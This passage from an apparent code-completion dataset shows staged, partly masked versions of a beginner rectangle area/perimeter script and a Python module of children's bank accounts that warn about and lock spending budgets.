"step-5": "import json\n\nsubjects = []\n\nwith open(\"sub.json\", 'r') as subject_file:\n\tsubjects = json.load(subject_file)\n\nprint(json.dumps(subjects, separators=(',',':')))\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('Perimeter is ' + str(perimeter) + ', Area is ' + str(area))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
x, y = 2.4, 6.4
perimeter = x * 2 + y * 2
area = x * y
print('Perimeter is ' + str(perimeter) + ', Area is ' + str(area))
<|reserved_special_token_1|>
'''
Write the necessary code to display the area and perimeter of a rectangle that has a width of 2.4 and a height of 6.4.
'''
x, y = 2.4, 6.4
perimeter = (x*2)+(y*2)
area = x*y
print("Perimeter is "+str(perimeter) + ", Area is " + str(area))
|
flexible
|
{
"blob_id": "a7de079866d7ac80260b438043cf0403f598cebc",
"index": 5091,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Perimeter is ' + str(perimeter) + ', Area is ' + str(area))\n",
"step-3": "<mask token>\nx, y = 2.4, 6.4\nperimeter = x * 2 + y * 2\narea = x * y\nprint('Perimeter is ' + str(perimeter) + ', Area is ' + str(area))\n",
"step-4": "'''\n\nWrite the necessary code to display the area and perimeter of a rectangle that has a width of 2.4 and a height of 6.4.\n\n'''\nx, y = 2.4, 6.4\nperimeter = (x*2)+(y*2)\narea = x*y\nprint(\"Perimeter is \"+str(perimeter) + \", Area is \" + str(area))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class AngelBankAccount(BankAccount):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.
TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() ->BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) ->BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print(
'Bank balance must be greater than or equal to 0! Please enter again!'
)
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](bank_account_no, bank_name,
bank_balance, budget_manager)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BankAccount(ABC):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _lock_budget(self, budget: Budget) ->None:
"""
Locks a budget.
:param budget: a Budget, the budget to be locked
:return: None
"""
budget.lock()
print(f'Your {budget.name} budget has now been locked!')
<|reserved_special_token_0|>
def get_budgets(self) ->list:
"""
Returns a list of budgets.
:return: a list of Budget objects
"""
return self.budget_manager.get_budgets()
<|reserved_special_token_0|>
class AngelBankAccount(BankAccount):
"""
This bank account is designed for Angel users. The Angel user
represents a user who's parents are not worried at all.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Never gets locked out of a budget category. They can continue
spending money even if they exceed the budget in question.
- Gets politely notified if they exceed a budget category.
- Gets a warning if they exceed more than 90% of a budget.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.9:
self._warn_nearing_exceed_budget(budget, 90)
self.print_transactions_for_review(budget)
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.
TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() ->BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) ->BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print(
'Bank balance must be greater than or equal to 0! Please enter again!'
)
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](bank_account_no, bank_name,
bank_balance, budget_manager)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BankAccount(ABC):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@abstractmethod
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Contains the logic to check if a warning or notification should
be issued to the user. It also locks a budget or this bank
account if needed. The exact algorithm would vary bank account
to bank account.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
pass
<|reserved_special_token_0|>
def _warn_nearing_exceed_budget(self, budget: Budget, exceeded_percent: int
) ->None:
"""
Issues a warning to the user that they are about to exceed this
budget.
:param budget: a Budget, the budget that they are about to
exceed
:param exceeded_percent: an int, the percent that they have
already exceeded
:return: None
"""
print(
f'[WARNING] You are about to exceed the {budget.name} budget! You went over {exceeded_percent}% of the total ${budget.total_amount}.'
)
<|reserved_special_token_0|>
def _lock_budget(self, budget: Budget) ->None:
"""
Locks a budget.
:param budget: a Budget, the budget to be locked
:return: None
"""
budget.lock()
print(f'Your {budget.name} budget has now been locked!')
def get_transactions_by_budget(self, category: BudgetCategory) ->list:
"""
Returns a list of transactions for the given budget category.
:param category: a BudgetCategory
:return: a list of Transaction, the transactions in that
category
"""
return [transaction for transaction in self.transactions if
transaction.budget_category == category]
def get_budgets(self) ->list:
"""
Returns a list of budgets.
:return: a list of Budget objects
"""
return self.budget_manager.get_budgets()
<|reserved_special_token_0|>
class AngelBankAccount(BankAccount):
"""
This bank account is designed for Angel users. The Angel user
represents a user who's parents are not worried at all.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Never gets locked out of a budget category. They can continue
spending money even if they exceed the budget in question.
- Gets politely notified if they exceed a budget category.
- Gets a warning if they exceed more than 90% of a budget.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.9:
self._warn_nearing_exceed_budget(budget, 90)
self.print_transactions_for_review(budget)
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.
TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() ->BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) ->BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print(
'Bank balance must be greater than or equal to 0! Please enter again!'
)
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](bank_account_no, bank_name,
bank_balance, budget_manager)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BankAccount(ABC):
<|reserved_special_token_0|>
def __init__(self, bank_account_no: str, bank_name: str, bank_balance:
float, budget_manager: BudgetManager):
"""
Initializes a bank account.
:param bank_account_no: a string
:param bank_name: a string
:param bank_balance: a float
:param budget_manager: a BudgetManager
"""
self.bank_account_no = bank_account_no
self.bank_name = bank_name
self.bank_balance = bank_balance
self.transactions = []
self.budget_manager = budget_manager
self._locked = False
def record_transaction(self, transaction: Transaction) ->bool:
"""
Records a transaction and returns True if this transaction is
recorded successfully. A transaction is recorded successfully
when this bank account is not locked, has enough balance, and
the budget associated with the transaction is not locked.
:param transaction: a Transaction, the transaction to record
:return: a bool, True if record successfully, False otherwise
"""
if self._locked:
print('Failed to record transaction! Your account has been locked!'
)
return False
if transaction.amount > self.bank_balance:
print('Failed to record transaction! Not enough balance!')
return False
budget = self.budget_manager.get_budget(transaction.budget_category)
if budget.locked:
print('Failed to record transaction! This budget has been locked!')
return False
self.transactions.append(transaction)
self.bank_balance -= transaction.amount
budget.amount_spent += transaction.amount
self._warn_and_lock_if_needed(transaction)
return True
@abstractmethod
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Contains the logic to check if a warning or notification should
be issued to the user. It also locks a budget or this bank
account if needed. The exact algorithm would vary bank account
to bank account.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
pass
def print_transactions_for_review(self, budget: Budget) ->None:
"""
Prints a list of transactions in the given budget for review.
:param budget: a Budget
:return: None
"""
print(
f'Please review the following transactions in the {budget.name} budget:'
)
transactions = self.get_transactions_by_budget(budget.category)
for transaction in transactions:
print(transaction)
def _warn_nearing_exceed_budget(self, budget: Budget, exceeded_percent: int
) ->None:
"""
Issues a warning to the user that they are about to exceed this
budget.
:param budget: a Budget, the budget that they are about to
exceed
:param exceeded_percent: an int, the percent that they have
already exceeded
:return: None
"""
print(
f'[WARNING] You are about to exceed the {budget.name} budget! You went over {exceeded_percent}% of the total ${budget.total_amount}.'
)
def _notify_exceeded_budget(self, budget: Budget) ->None:
"""
Notifies the user that they've just exceeded this budget.
:param budget: a Budget, the budget that they've just exceeded
:return: None
"""
print(f'[NOTIFICATION] You have exceeded the {budget.name} budget.')
def _lock_budget(self, budget: Budget) ->None:
"""
Locks a budget.
:param budget: a Budget, the budget to be locked
:return: None
"""
budget.lock()
print(f'Your {budget.name} budget has now been locked!')
def get_transactions_by_budget(self, category: BudgetCategory) ->list:
"""
Returns a list of transactions for the given budget category.
:param category: a BudgetCategory
:return: a list of Transaction, the transactions in that
category
"""
return [transaction for transaction in self.transactions if
transaction.budget_category == category]
def get_budgets(self) ->list:
"""
Returns a list of budgets.
:return: a list of Budget objects
"""
return self.budget_manager.get_budgets()
def __str__(self):
transactions_info = ''
for transaction in self.transactions:
transactions_info += f'{transaction}\n'
if len(transactions_info) == 0:
transactions_info = "You haven't made any transaction yet.\n"
return f"""*** Bank Account Details ***
• Bank account number: {self.bank_account_no}
• Bank name: {self.bank_name}
• Status: {'Locked' if self._locked else 'Available'}
• Transactions:
{transactions_info}• Closing balance: ${self.bank_balance}"""
class AngelBankAccount(BankAccount):
"""
This bank account is designed for Angel users. The Angel user
represents a user who's parents are not worried at all.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Never gets locked out of a budget category. They can continue
spending money even if they exceed the budget in question.
- Gets politely notified if they exceed a budget category.
- Gets a warning if they exceed more than 90% of a budget.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.9:
self._warn_nearing_exceed_budget(budget, 90)
self.print_transactions_for_review(budget)
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.
TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() ->BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) ->BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print(
'Bank balance must be greater than or equal to 0! Please enter again!'
)
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](bank_account_no, bank_name,
bank_balance, budget_manager)
<|reserved_special_token_1|>
"""
This module contains the class definitions for all types of BankAccount
alongside BankAccountCreator as a supporting class to create an
appropriate bank account for a given user type.
"""
from abc import ABC
from abc import abstractmethod
from transaction import Transaction
from budget import Budget
from budget import BudgetManager
from budget import BudgetCategory
from budget import BudgetCreator
from user import UserType
class BankAccount(ABC):
    """
    Abstract base class modelling a child's bank account.

    Every concrete bank account carries:
    - a bank account number
    - a bank name
    - a bank balance
    - a budget manager that owns the per-category budgets
    - a list of recorded transactions
    - a locked flag that, once set, rejects all further transactions
    """

    def __init__(self, bank_account_no: str, bank_name: str,
                 bank_balance: float, budget_manager: BudgetManager):
        """
        Initializes a bank account.
        :param bank_account_no: a string
        :param bank_name: a string
        :param bank_balance: a float
        :param budget_manager: a BudgetManager
        """
        self.bank_account_no = bank_account_no
        self.bank_name = bank_name
        self.bank_balance = bank_balance
        self.transactions = []
        self.budget_manager = budget_manager
        self._locked = False

    def record_transaction(self, transaction: Transaction) -> bool:
        """
        Records a transaction and returns True if this transaction is
        recorded successfully. A transaction is recorded successfully
        when this bank account is not locked, has enough balance, and
        the budget associated with the transaction is not locked.
        :param transaction: a Transaction, the transaction to record
        :return: a bool, True if record successfully, False otherwise
        """
        failure = None
        # Checks run in a fixed order: account lock, balance, budget lock.
        if self._locked:
            failure = ('Failed to record transaction! '
                       'Your account has been locked!')
        elif transaction.amount > self.bank_balance:
            failure = 'Failed to record transaction! Not enough balance!'
        else:
            budget = self.budget_manager.get_budget(
                transaction.budget_category)
            if budget.locked:
                failure = ('Failed to record transaction! '
                           'This budget has been locked!')
        if failure is not None:
            print(failure)
            return False
        self.transactions.append(transaction)
        self.bank_balance -= transaction.amount
        budget.amount_spent += transaction.amount
        # Let the concrete account type decide on warnings / locking.
        self._warn_and_lock_if_needed(transaction)
        return True

    @abstractmethod
    def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:
        """
        Contains the logic to check if a warning or notification should
        be issued to the user. It also locks a budget or this bank
        account if needed. The exact algorithm would vary bank account
        to bank account.
        :param transaction: a Transaction, the newly recorded
        transaction
        :return: None
        """
        pass

    def print_transactions_for_review(self, budget: Budget) -> None:
        """
        Prints a list of transactions in the given budget for review.
        :param budget: a Budget
        :return: None
        """
        header = (f'Please review the following transactions in the '
                  f'{budget.name} budget:')
        print(header)
        for txn in self.get_transactions_by_budget(budget.category):
            print(txn)

    def _warn_nearing_exceed_budget(self, budget: Budget,
                                    exceeded_percent: int) -> None:
        """
        Issues a warning to the user that they are about to exceed this
        budget.
        :param budget: a Budget, the budget that they are about to
        exceed
        :param exceeded_percent: an int, the percent that they have
        already exceeded
        :return: None
        """
        warning = (f'[WARNING] You are about to exceed the {budget.name} '
                   f'budget! You went over {exceeded_percent}% of the total '
                   f'${budget.total_amount}.')
        print(warning)

    def _notify_exceeded_budget(self, budget: Budget) -> None:
        """
        Notifies the user that they've just exceeded this budget.
        :param budget: a Budget, the budget that they've just exceeded
        :return: None
        """
        print(f'[NOTIFICATION] You have exceeded the {budget.name} budget.')

    def _lock_budget(self, budget: Budget) -> None:
        """
        Locks a budget.
        :param budget: a Budget, the budget to be locked
        :return: None
        """
        budget.lock()
        print(f'Your {budget.name} budget has now been locked!')

    def get_transactions_by_budget(self, category: BudgetCategory) -> list:
        """
        Returns a list of transactions for the given budget category.
        :param category: a BudgetCategory
        :return: a list of Transaction, the transactions in that
        category
        """
        return list(filter(
            lambda txn: txn.budget_category == category,
            self.transactions,
        ))

    def get_budgets(self) -> list:
        """
        Returns a list of budgets.
        :return: a list of Budget objects
        """
        return self.budget_manager.get_budgets()

    def __str__(self):
        # One line per transaction, each terminated by a newline so the
        # closing-balance line lines up directly underneath.
        history = ''.join(f'{txn}\n' for txn in self.transactions)
        if not history:
            history = "You haven't made any transaction yet.\n"
        status = "Locked" if self._locked else "Available"
        return (f'*** Bank Account Details ***\n'
                f'• Bank account number: {self.bank_account_no}\n'
                f'• Bank name: {self.bank_name}\n'
                f'• Status: {status}\n'
                f'• Transactions:\n'
                f'{history}'
                f'• Closing balance: ${self.bank_balance}')
class AngelBankAccount(BankAccount):
    """
    This bank account is designed for Angel users. The Angel user
    represents a user who's parents are not worried at all.
    """

    def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:
        """
        Issues a warning or locks budget/bank account when these
        conditions are met:
        - Never gets locked out of a budget category. They can continue
        spending money even if they exceed the budget in question.
        - Gets politely notified if they exceed a budget category.
        - Gets a warning if they exceed more than 90% of a budget.
        :param transaction: a Transaction, the newly recorded
        transaction
        :return: None
        """
        budget = self.budget_manager.get_budget(transaction.budget_category)
        ratio = budget.exceeded_ratio
        # Under 90% of the budget: nothing to report.
        if ratio <= 0.9:
            return
        if ratio > 1:
            self._notify_exceeded_budget(budget)
        else:
            self._warn_nearing_exceed_budget(budget, 90)
        self.print_transactions_for_review(budget)
class TroublemakerBankAccount(BankAccount):
    """
    This bank account is designed for Troublemaker children. These
    children often find themselves in trouble. These are usually minor
    incidents and their parents are concerned but not worried.
    """

    def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:
        """
        Issues a warning or locks budget/bank account when these
        conditions are met:
        - Gets a warning if they exceed more than 75% of a budget
        category.
        - Gets politely notified if they exceed a budget category.
        - Gets locked out of conducting transactions in a budget
        category if they exceed it by 120% of the amount assigned to the
        budget in question.
        :param transaction: a Transaction, the newly recorded
        transaction
        :return: None
        """
        budget = self.budget_manager.get_budget(transaction.budget_category)
        ratio = budget.exceeded_ratio
        # Under 75% of the budget: nothing to report.
        if ratio <= 0.75:
            return
        if ratio > 1.2:
            self._lock_budget(budget)
        elif ratio > 1:
            self._notify_exceeded_budget(budget)
        else:
            self._warn_nearing_exceed_budget(budget, 75)
        self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
    """
    This bank account is designed for Rebel children. The Rebel
    represents a child who refuses to follow any rules and believes that
    society should be broken down and restructured. Parents of these
    children are quite worried about them.
    """

    def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:
        """
        Issues a warning or locks budget/bank account when these
        conditions are met:
        - They get a warning for every transaction after exceeding 50%
        of a budget.
        - Gets ruthlessly notified if they exceed a budget category.
        - Gets locked out of conducting transactions in a budget
        category if they exceed it by 100% of the amount assigned to the
        budget in question.
        - If they exceed their budget in 2 or more categories then they
        get locked out of their account completely.
        :param transaction: a Transaction, the newly recorded
        transaction
        :return: None
        """
        budget = self.budget_manager.get_budget(transaction.budget_category)
        ratio = budget.exceeded_ratio
        # Under 50% of the budget: nothing to report.
        if ratio <= 0.5:
            return
        if ratio > 1:
            self._notify_exceeded_budget(budget)
            self._lock_budget(budget)
            self.print_transactions_for_review(budget)
            # Two or more locked budgets locks the entire account.
            if self.budget_manager.no_locked_budgets >= 2:
                self._locked = True
                print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
        else:
            self._warn_nearing_exceed_budget(budget, 50)
            self.print_transactions_for_review(budget)
class BankAccountCreator:
    """
    A utility class that helps create a BankAccount.
    """

    _user_type_mapper = {
        UserType.ANGEL: AngelBankAccount,
        UserType.TROUBLEMAKER: TroublemakerBankAccount,
        UserType.REBEL: RebelBankAccount,
    }
    """
    A dictionary that maps a UserType enum to an appropriate BankAccount
    class.
    """

    @staticmethod
    def load_test_account() -> BankAccount:
        """
        Creates and returns a test bank account.
        :return: a BankAccount
        """
        budget_manager = BudgetCreator.load_test_budget_manager()
        return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)

    @classmethod
    def create_bank_account(cls, user_type: UserType) -> BankAccount:
        """
        Prompts the user for bank account details, initializes a Bank
        Account based on the given user type and returns it.
        :param user_type: a UserType
        :return: a BankAccount
        """
        bank_account_no = input('Enter bank account number: ')
        bank_name = input('Enter bank name: ')
        bank_balance = -1.0
        while bank_balance < 0:
            # Bug fix: a non-numeric entry used to crash the program with
            # an unhandled ValueError; now it re-prompts instead.
            try:
                bank_balance = float(input('Enter bank balance: '))
            except ValueError:
                print('Bank balance must be a number! Please enter again!')
                continue
            if bank_balance < 0:
                print('Bank balance must be greater than or equal to 0! Please'
                      ' enter again!')
        budget_manager = BudgetCreator.create_budget_manager()
        return cls._user_type_mapper[user_type](
            bank_account_no,
            bank_name,
            bank_balance,
            budget_manager,
        )
|
flexible
|
{
"blob_id": "830ae4b6a6b2c4e1bbe6928b3a4b0be86d2ec7a3",
"index": 3743,
